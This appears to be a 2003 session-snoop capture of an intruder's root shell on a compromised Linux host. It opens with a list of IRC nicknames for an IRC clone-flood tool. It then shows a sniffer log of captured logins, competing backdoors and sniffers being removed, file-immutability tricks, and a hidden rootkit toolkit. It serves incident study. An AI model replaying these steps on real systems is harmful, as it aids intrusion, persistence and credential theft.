PERMALOSO
birillo46
litta
Gad
EBE9
maurino
Z10F3ST3R
ReArtu
olivia78
brigitta
igi09
SATAN_INS
LullaBy
JavaGrl
Alberto2
ALVIN^
DottMorte
sharmm
Tato_38
Blietta
MARCO31
mary30
WolfMan
rita26
daniela
RONALDO9
fluffer
TOPO
FwsMou
ragnetto
Judy
fqw
mimma
vass
only
bizio
Quattro
giugno
Diabolik
CURE
sm4ck
vento
ragio
Elly
CubaLibre
Furunkuli
Organza
Yashy
athanas
legend4
xarasou
L_egend5
einaimou
OuRLoVe
Zwi-Mou
Zwi-Sou
Psixi-Mou
aCrImA
ALE39
Anja
Cocker
ArNtZ
skill
Grave25
vajje
vidXXX
M1g-2
CrnaRuka
BlackHand
Studenica
Kajman
MaRaKaNa
Bedem
Kalca
Jamezdin
SkyGuN
musc1e
PaZaRaC
Nimfa
Suhoj-35
Manari-Sou
Psixi-Sou
Manarimou
DumbBl0nD
L0ala
Kralj
Sopocani
Sodoma
Tvrdjava
Andjela
Gomora
MaRaDoNa
Kiwi
ZvEzDa
Ibar
Raska
Dusica
Ribica
KaSaNdRa
Vanda
Harry
Mika
mro
Dolphin
Bram
wanderer
wanderer
Freud
Mamaw
Mamaw
shekel
devastor
juha
SkyLink
Sethi
NeuTRiNo
|Des|
quattro-
ogre
Dario
msd
tenx
Coop_
Szern-
MOLadmin
TaLLa2XLC
shekel
CHaiNeSS
Beeth
aS2
kurai
primetime
Muti
MHz
Turing
Elef
nico
coke
krista
snake
Mephisto
scorpi0n
anjing
MiG-99
BOPOH
krash
whiskey
erixon
CHainGone
Dracon
Engerim
Vrgnie
Dolfi
koopal
bluebus
Alphaa
quattro76
gr8ron
custodes
Meph
AlterEgo
Mordeshur
emmi
SeaLink
H_lios
mrBLOM
Vader
gUFoao597
tMHd
Hug0
mu
Mikko
Tero
herbiez
KuPPa69
juhas
CountZero
kilroi-
aPeq
kilroi
s0rk_
di-tal
corVONero
Uoff
cleX
sLASh
CooperS
Littleboy
ra
reflect
chriz
gerhard
marco77
luarbiasa
JJ_
boy83
bobi3
sexbolek
ken1
ROB_
mrxx
brio
kikii
ktx
kamiLeon_
Shortys
Mr_Bate
KaViee
ASSSA
to
MonkeyBoy
OMEGA666
kewin___
klimas
[jazz]
Janet
gizmo
Abyss
saalut
blacky
HongKong
BlondeNor
sand`
yasin23
LoneWolf6
Jason_
[FunnY]
free19m
M_A_X
Colin-
rigo_
nino
Skru
Ivan21
MrBeauty
wow
daw3
Spirtouli
McAlcota
maurino2
Girlie16
vajje
Rix
Carlo_To
Mike19
Dimka_m
Rick
MyBoy
Jockey
SexyMan22
eGGiST^2
Mike^22
Ron26Wrl
ranu
hayes
Linda__
Anna
Kikeli
Spanker
yang
julze
RikuxR
Kliimax-
Viagara`
Gili
Condoom-
Pessaar-
Roku_
Rikuta-
Tampone-
Hallas-
MaCe|sg0l
aint|here
James--
Hammer
GoLd|3
afk-demon
syNc|pHos
bast_
VerTie^
P0_Zzzz
Madd
Mark
richard
Vaismi
MikaV
P-PER
lph
Poesje
XzOnE
TheS4int
iban3z
sidewalk_
Psychosis`
shred
Raistl`n
ph00re
Lunatic
TheFox
poison`
JaimeAFK
x0x0x
ceman^mP
CREAD`
FiRe|away
GAmppy
musc__
MRtaBizy
Ch0ck
snIke
pszaah
MaCe|sg0l
dangelo
keung
PsY^iDLe
mal0r
jornx
ibanez
Yakz0r
MikemcgiI
Perroz
PRIMERA
Cintat
Switch
Pinball
illusi0ns
melinda
clarissa
timer
Cracker
Utopia
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ls
id         mf         mirkforce  nicks2
idents     mfclean    nicks      realnames
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ./id
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# . ps
  PID   TTY   STAT  TIME COMMAND
  928   1     S    0:00 /sbin/mingetty tty1 
  929   2     S    0:00 /sbin/mingetty tty2 
  930   3     S    0:00 /sbin/mingetty tty3 
  931   4     S    0:00 /sbin/mingetty tty4 
  935   5     S    0:00 /sbin/mingetty tty5 
  936   6     S    0:00 /sbin/mingetty tty6 
20635  ?      S    0:00 -tcsh 
20662  ?      S    0:00 /sbin/bash 
20664  p2     S    0:00 /bin/bash 
21030  p2     R    0:00 ps 
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ./mirkforce~
bash: ./mirkforce~: No such file or directory
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]#  ./mirkforce
rand0m seed from /dev/urandom: -1415677926
Found nickz file. index: 26
Found identz file. index: 85
Found realnamez file. index: 21
Your IPaddr: 192.168.20.1 (eth0)
Checking 192.168.20.*
[
*]

...hErE c0m3z tHa lEEtfOrCe! (riding 252 IPz)
*Cleaning up...
SIOCSIFADDR: File exists
*** err0r when cleaning up, msg programmer :>
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# 
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# 
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# 
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# ls
id         mf         mirkforce  nicks2
idents     mfclean    nicks      realnames
]0;root@pc11: /usr/bin/.tux/tools/ecmf[root@pc11 ecmf]# exit

Back at local tty.
end at Mon Jun 16 04:54:55 HKT 2003
----------------------------------


Mon Jun 16 05:34:51 HKT 2003
================================

Connected to ttyp2 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
w
  4:31am  up 12 days, 13:21,  0 users,  load average: 0.00, 0.00, 0.04
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
]0;root@pc11: /root[root@pc11 /root]# cd /etc./  /nmh/...
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# ./read tcp.log  
Mon Jun 16 04:31:25 HKT 2003
----------------------------------------------------------------------
[ 21]   pc11                        anonymous@ftp.microsoft.com abc@126.com
[ 23]   pc11                        Fracktal        bluebird
[ 23]   pc11                        inge2           
[ 23]   pc11                        inge2           P
[ 23]   pc11                        inge3           unset HISTFILE
[ 23]   pc11                        inge3           unset HISTFInset HISTFILE
[ 23]   pc11                        !operator       bluebird
[ 23]   pc11                        operator        Fracktal
[ 23]   pc11                        opratore        bluebird
[ 23]   pc11                        Pinge           
----------------------------------------------------------------------
Mon Jun 16 04:31:25 HKT 2003
-------------------------------------------------------------------EOF
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# userdel operator
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# userdel Fracktal
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# ps fax
  PID   TTY   STAT  TIME COMMAND
    1  ?      S    0:05 init [3]  
    2  ?      SW   0:00 [keventd]
    3  ?      SW   0:00 [kapm-idled]
    4  ?      SW   0:04 [kswapd]
    5  ?      SW   0:00 [kreclaimd]
    6  ?      SW   0:00 [bdflush]
    7  ?      SW   0:01 [kupdated]
    8  ?      SW<  0:00 [mdrecoveryd]
  175  ?      S    0:22 write 
  179  ?      S    0:01 java 
21151  ?      S    0:00  \_ java 
21153  ?      S    0:00      \_ -tcsh 
21180  ?      S    0:00          \_ /sbin/bash 
21182  p2     S    0:00              \_ /bin/bash 
21269  p2     R    0:00                  \_ ps fax 
  181  ?      S    0:20 write 
  197  ?      S    0:19 write 
  634  ?      S    0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scri
  691  ?      S    0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.m
  771  ?      S    0:00 xinetd -reuse -pidfile /var/run/xinetd.pid 
28739  ?      S N  0:00  \_ //bin/sh 
  903  ?      S    0:42 /usr/sbin/mysqld 
21216  ?      S    0:00  \_ /usr/sbin/mysqld 
  926  ?      S    0:20 write 
  928   1     S    0:00 /sbin/mingetty tty1 
  929   2     S    0:00 /sbin/mingetty tty2 
  930   3     S    0:00 /sbin/mingetty tty3 
  931   4     S    0:00 /sbin/mingetty tty4 
  935   5     S    0:00 /sbin/mingetty tty5 
  936   6     S    0:00 /sbin/mingetty tty6 
  975  ?      S    0:00 mkdir tmp 
 2987  ?      R N  0:05 write 
 3129  ?      R N  0:05 write 
 3917  ?      R N  0:05 write 
 4061  ?      R N  0:03 write 
 4098  ?      S    0:07 write 
 7990  ?      S    1:52 ./fam 
 8028  ?      S    0:00 smbd -D 
17090  ?      S    0:00 sh -c "(swapd)" & 
17099  ?      T    0:00  \_ /sbin/modprobe -s -k -- binfmt-0000 
17100  ?      Z    0:00      \_ [modprobe ]
20938  ?      S    0:00 xinetd -reuse -pidfile /var/run/xinetd.pid 
21138  ?      S    0:00 syslogd -m 0 
21148  ?      S    0:00 klogd -2 
21242  ?      R    0:50 /bin/mingetty ttyp2 
21243  ?      S    0:00 /bin/number_cum -w 1 data1.dat 0012 
 2992  ?      S N  0:00 portmap 
]0;root@pc11: /etc/nmh/...[root@pc11 ...]# cd curatare/
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# ./ps fax
  PID TTY      STAT   TIME COMMAND
    1 ?        S      0:05 init [3] 
    2 ?        SW     0:00 [keventd]
    3 ?        SW     0:00 [kapm-idled]
    4 ?        SW     0:04 [kswapd]
    5 ?        SW     0:00 [kreclaimd]
    6 ?        SW     0:00 [bdflush]
    7 ?        SW     0:01 [kupdated]
    8 ?        SW<    0:00 [mdrecoveryd]
  175 ?        S      0:22 write
  179 ?        S      0:01 java
21151 ?        S      0:00  \_ java
21153 pts/1    S      0:00      \_ -tcsh
21180 pts/1    S      0:00          \_ /sbin/bash
21182 ttyp2    S      0:00              \_ /bin/bash
21270 ttyp2    R      0:00                  \_ ./ps fax
  181 ?        S      0:20 write
  197 ?        S      0:19 write
  634 ?        S      0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-sc
  691 ?        S      0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto
  771 ?        S      0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
28739 ?        SN     0:00  \_ //bin/sh
  903 ?        S      0:42 /usr/sbin/mysqld
21216 ?        S      0:00  \_ /usr/sbin/mysqld
  926 ?        S      0:20 write
  928 tty1     S      0:00 /sbin/mingetty tty1
  929 tty2     S      0:00 /sbin/mingetty tty2
  930 tty3     S      0:00 /sbin/mingetty tty3
  931 tty4     S      0:00 /sbin/mingetty tty4
  935 tty5     S      0:00 /sbin/mingetty tty5
  936 tty6     S      0:00 /sbin/mingetty tty6
  975 ?        S      0:00 mkdir tmp
 7990 ?        S      1:52 ./fam
 8028 ?        S      0:00 smbd -D
17090 ?        S      0:00 sh -c "(swapd)" &
17099 ?        T      0:00  \_ /sbin/modprobe -s -k -- binfmt-0000
17100 ?        Z      0:00      \_ [modprobe ]
20926 ?        S      0:00 sendmail: accepting connections on port 25           
20930 ?        S      0:01 sshd -q -p 2000 -f /etc/ssh/sshd_config
20938 ?        S      0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
 2987 ?        SN     0:05 write
 2992 ?        SN     0:00 portmap
 3129 ?        SN     0:05 write
 3917 ?        SN     0:05 write
 4061 ?        SN     0:03 write
 4098 ?        S      0:07 write
21138 ?        S      0:00 syslogd -m 0
21148 ?        S      0:00 klogd -2
21242 ?        R      1:02 /bin/mingetty ttyp2
21243 ?        S      0:00 /bin/number_cum -w 1 data1.dat 0012
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# kill -9 20930
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# killall -9 -vq sshd
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# ls -la /proc/*/exe
ls: /proc/17100/exe: No such file or directory
ls: /proc/2/exe: No such file or directory
ls: /proc/3/exe: No such file or directory
ls: /proc/4/exe: No such file or directory
ls: /proc/5/exe: No such file or directory
ls: /proc/6/exe: No such file or directory
ls: /proc/7/exe: No such file or directory
ls: /proc/8/exe: No such file or directory
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/1/exe -> /sbin/init
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/17090/exe -> /bin/bash
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/17099/exe -> /sbin/insmod
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/17100/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/175/exe -> /usr/bin/.tux/tools/sniffer/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/179/exe -> /usr/bin/java
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/181/exe -> /usr/bin/.configuration/.. /write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/197/exe -> /etc/nmh/.../write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/2/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/20926/exe -> /usr/local/sbin/sshd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/20938/exe -> /usr/sbin/xinetd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21138/exe -> /sbin/syslogd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21148/exe -> /sbin/klogd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21151/exe -> /usr/bin/java
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21153/exe -> /bin/tcsh
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21180/exe -> /sbin/bash
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21182/exe -> /bin/bash
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21216/exe -> /usr/sbin/mysqld
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21242/exe -> /bin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/21243/exe -> /bin/number_cum
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/28739/exe -> /bin/bash
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/2987/exe -> /usr/lib/conf/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/2992/exe -> /sbin/portmap
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/3/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/3129/exe -> /usr/bin/.tux/tools/sniffer/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/3917/exe -> /usr/lib/conf/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/4/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/4061/exe -> /usr/bin/.tux/tools/sniffer/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/4098/exe -> /usr/lib/conf/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/5/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/6/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/634/exe -> /usr/sbin/apmd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/691/exe -> /usr/sbin/automount
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/7/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/771/exe -> /usr/sbin/xinetd
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/7990/exe -> /usr/bin/.tux/tools/psybnc/fam
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/8/exe
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/8028/exe -> /usr/bin/smbd -D
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/903/exe -> /usr/sbin/mysqld
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/926/exe -> /usr/bin/.tux/tools/sniffer/write
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/928/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/929/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/930/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/931/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/935/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/936/exe -> /sbin/mingetty
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/975/exe -> /bin/mkdir
lrwxrwxrwx   1 root     root            0 Jun 16 04:34 /proc/self/exe -> /bin/ls
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# kill    cd /usr/lib/conf/write\ 
bash: cd: /usr/lib/conf/write: Not a directory
]0;root@pc11: /etc/nmh/.../curatare[root@pc11 curatare]# cd /usr/lib/conf/write      
]0;root@pc11: /usr/lib/conf[root@pc11 conf]# ls
curatare  read      write
]0;root@pc11: /usr/lib/conf[root@pc11 conf]# cd ..
]0;root@pc11: /usr/lib[root@pc11 lib]# cd ..
]0;root@pc11: /usr[root@pc11 /usr]# cd 
]0;root@pc11: /root[root@pc11 /root]# rm -rf /usr/lib/conf/write
]0;root@pc11: /root[root@pc11 /root]# /usr/lib/conf/write     
bash: /usr/lib/conf/: is a directory
]0;root@pc11: /root[root@pc11 /root]# rm -rf /usr/lib/conf/
]0;root@pc11: /root[root@pc11 /root]# rm -rf /usr/local/sbin/sshd
rm: cannot unlink `/usr/local/sbin/sshd': Operation not permitted
]0;root@pc11: /root[root@pc11 /root]# chattr -saui /usr/local/sbin/sshd
]0;root@pc11: /root[root@pc11 /root]# rm -rf /usr/local/sbin/sshd
]0;root@pc11: /root[root@pc11 /root]# touch /usr/local/sbin/sshd
]0;root@pc11: /root[root@pc11 /root]# chattr +saui /usr/local/sbin/sshd
]0;root@pc11: /root[root@pc11 /root]# cd /etc/    usr/n bin/.tux/tools
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ./socklist 
type  port      inode     uid    pid   fd  name
tcp    513       1303       0    771    7  xinetd
tcp    514       1302       0    771    6  xinetd
tcp    995       1304       0    771    8  xinetd
tcp   3306       1579       0    903    3  mysqld
tcp    555     124160       0  20926   21  sshd
tcp   6668      94672       0   7990    9  fam
tcp    111     194193       0   2992   15  portmap
tcp    143       1305       0    771    9  xinetd
tcp  10003      94807       0   8028   13  smbd
tcp     21       1299       0    771    3  xinetd
tcp     23       1301       0    771    5  xinetd
tcp    120        337       0    179    4  java
tcp   6010     276143       0  21216    3  mysqld
tcp   1048     276206       0  21243    5  number_cum
tcp   1053     277849       0   7990   14  fam
tcp    120     276016       0  21151    3  java
tcp   6668     277348       0   7990   18  fam
tcp   3306     276138       0  21216    4  mysqld
tcp     21     163664       0  28739    1  sh
tcp   4283     263750       0   7990   15  fam
tcp     21     186128       0   4061    1  write
tcp   4279     263726       0   7990   16  fam
udp    514     275846       0  21138    6  syslogd
udp     69     124237       0  20938    3  xinetd
udp     69       1300       0    771    4  xinetd
udp   3049       2106       0    975    5  mkdir
udp    111     194178       0   2992   14  portmap
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# killall -9 -vq sshd
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ./socklist 
type  port      inode     uid    pid   fd  name
tcp    513       1303       0    771    7  xinetd
tcp    514       1302       0    771    6  xinetd
tcp    995       1304       0    771    8  xinetd
tcp   3306       1579       0    903    3  mysqld
tcp    555     124160       0  20926   21  sshd
tcp   6668      94672       0   7990    9  fam
tcp    111     194193       0   2992   15  portmap
tcp    143       1305       0    771    9  xinetd
tcp  10003      94807       0   8028   13  smbd
tcp     21       1299       0    771    3  xinetd
tcp     23       1301       0    771    5  xinetd
tcp    120        337       0    179    4  java
tcp   6010     276143       0  21216    3  mysqld
tcp   1048     276206       0  21243    5  number_cum
tcp   1053     277849       0   7990   14  fam
tcp    120     276016       0  21151    3  java
tcp   6668     277348       0   7990   18  fam
tcp   3306     276138       0  21216    4  mysqld
tcp     21     163664       0  28739    1  sh
tcp   4283     263750       0   7990   15  fam
tcp     21     186128       0   4061    1  write
tcp   4279     263726       0   7990   16  fam
udp    514     275846       0  21138    6  syslogd
udp     69     124237       0  20938    3  xinetd
udp     69       1300       0    771    4  xinetd
udp   3049       2106       0    975    5  mkdir
udp    111     194178       0   2992   14  portmap
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# kill -9 20926
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# kill -9 20926./socklist 
type  port      inode     uid    pid   fd  name
tcp    513       1303       0    771    7  xinetd
tcp    514       1302       0    771    6  xinetd
tcp    995       1304       0    771    8  xinetd
tcp   3306       1579       0    903    3  mysqld
tcp   6668      94672       0   7990    9  fam
tcp    111     194193       0   2992   15  portmap
tcp    143       1305       0    771    9  xinetd
tcp  10003      94807       0   8028   13  smbd
tcp     21       1299       0    771    3  xinetd
tcp     23       1301       0    771    5  xinetd
tcp    120        337       0    179    4  java
tcp   6010     276143       0  21216    3  mysqld
tcp   1048     276206       0  21243    5  number_cum
tcp    120     276016       0  21151    3  java
tcp   6668     277348       0   7990   18  fam
tcp   3306     276138       0  21216    4  mysqld
tcp     21     163664       0  28739    1  sh
tcp   4283     263750       0   7990   15  fam
tcp     21     186128       0   4061    1  write
tcp   4279     263726       0   7990   16  fam
udp    514     275846       0  21138    6  syslogd
udp     69     124237       0  20938    3  xinetd
udp     69       1300       0    771    4  xinetd
udp   3049       2106       0    975    5  mkdir
udp    111     194178       0   2992   14  portmap
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd firewall
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# \./close 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ./close 555
Firewall rulez
Presented by Fracktal
Fracktal@fracktal.us
(C) 06-10-2002

Closing port 555... done.
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ./close 555   cd firewall
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# ./close 10003
Firewall rulez
Presented by Fracktal
Fracktal@fracktal.us
(C) 06-10-2002

Closing port 10003... done.
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# killall -9 -vq smbd
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# killall -9 -vq smbd
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# killall -9 -vq smbd
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# telnet localhost 10003
Trying 127.0.0.1...

]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# telnet localhost 10003       120
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
SSH-1.5-1.2.27

Connection closed by foreign host.
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# 
]0;root@pc11: /usr/bin/.tux/tools/firewall[root@pc11 firewall]# cd ..
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# ls
bitchx         firewall       sniffer        ssh
ecmf           firewall.tgz   socklist       synscan
exploits       psymicutz.tgz  socklist.tgz   utils
]0;root@pc11: /usr/bin/.tux/tools[root@pc11 tools]# cd psybnc
]0;root@pc11: /usr/bin/.tux/tools/psybnc[root@pc11 psybnc]# cat psybnc.pid
7990
]0;root@pc11: /usr/bin/.tux/tools/psybnc[root@pc11 psybnc]# kill -9 7990
]0;root@pc11: /usr/bin/.tux/tools/psybnc[root@pc11 psybnc]# pico psybnc.conf